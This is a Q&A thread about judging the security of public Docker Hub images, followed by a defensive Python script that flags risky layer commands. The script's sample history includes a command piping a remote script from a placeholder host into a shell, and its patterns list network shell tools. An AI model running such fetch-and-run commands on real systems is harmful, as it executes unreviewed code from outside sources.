How do you know that public Docker images are secure?

I'm just getting started with Docker, and I see that there are lots of images available at the docker hub repository. It seems like the normal way to set up a new docker container is to copy one of these images and go from there. But how do I know that these containers don't have malicious code in them, or that they don't compromise my security in some other way?

For instance, how do I know that the OS in the container isn't (for example) capturing keystrokes if I ssh into it, or hijacking system resources for some other purpose?

Thomas Johnson Avatar asked Oct 21 '22 05:10

1 Answer

The images marked as "Trusted build" are built by Docker on their server from the sources given by the user. You can easily check the Dockerfile from which the image has been built to check for malicious code.

You also have the 'official' images (those that do not start with 'something/') that are officially supported by Docker. If you trust Docker, Inc., you can trust those images.

For the third-party images, not from a trusted build and not from Docker, you can check the history with docker history <image> (after pulling it) to see how it has been built, but common sense applies. It cannot be trusted.

Docker is working on provenance, so we should soon see CA certificate checks and proof of origin. Until then, just be careful and use only trusted builds that you checked, or official images.

creack Avatar answered Oct 22 '22 23:10

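As an added example (not part of the question or answer above), here is a small Python audit of the layer history the answer suggests reviewing. It assumes the history was captured with `docker history --no-trunc --format '{{json .}}' <image>` (one JSON object per line, newest layer first, with the fields ID, CreatedBy, Size and Comment) and uses a constructed sample in place of a real image.

```python
import json
import re

# Constructed sample of `docker history --no-trunc --format '{{json .}}'` output,
# newest layer first. The layer commands are made up for illustration.
SAMPLE_HISTORY = "\n".join([
    '{"ID":"sha256:aaa","CreatedBy":"/bin/sh -c #(nop)  CMD [\\"sshd\\" \\"-D\\"]","Size":"0B","Comment":""}',
    '{"ID":"<missing>","CreatedBy":"/bin/sh -c curl -sSL http://example.invalid/setup.sh | sh","Size":"4.2MB","Comment":""}',
    '{"ID":"<missing>","CreatedBy":"/bin/sh -c apt-get update && apt-get install -y openssh-server","Size":"60MB","Comment":""}',
    '{"ID":"<missing>","CreatedBy":"/bin/sh -c #(nop) ADD file:abc in /","Size":"72MB","Comment":""}',
])

# Layer commands a reviewer should read closely before trusting a third-party image.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "remote script piped into a shell"),
    (re.compile(r"^ADD\s+https?://"), "ADD fetches content from a remote URL"),
    (re.compile(r"\bchmod\b.*(\+s|\s[24-7][0-7]{3})\b"), "setuid/setgid bit set"),
    (re.compile(r"\b(nc|ncat|socat)\b"), "raw network tool installed or invoked"),
]

def layer_instruction(created_by):
    """Reduce the raw CreatedBy string to the Dockerfile instruction it came from."""
    cmd = created_by.strip()
    if "#(nop)" in cmd:                       # metadata layer: FROM/ADD/COPY/CMD/ENV ...
        return cmd.split("#(nop)", 1)[1].strip()
    if cmd.startswith("/bin/sh -c "):         # RUN layer
        return "RUN " + cmd[len("/bin/sh -c "):]
    return cmd

def audit_history(history_jsonl):
    """Return (instructions oldest-first, list of (instruction, reason) findings)."""
    layers = [json.loads(line) for line in history_jsonl.splitlines() if line.strip()]
    layers.reverse()                           # docker history prints newest first
    instructions = [layer_instruction(layer["CreatedBy"]) for layer in layers]
    findings = [(ins, reason) for ins in instructions
                for pattern, reason in SUSPICIOUS if pattern.search(ins)]
    return instructions, findings

if __name__ == "__main__":
    steps, hits = audit_history(SAMPLE_HISTORY)
    for step in steps:
        print(step)
    for ins, reason in hits:
        print(f"REVIEW: {reason}: {ins}")
```

The reconstructed instruction list is a rough substitute for the Dockerfile when none is published; the flagged lines are starting points for manual review, not a verdict on the image.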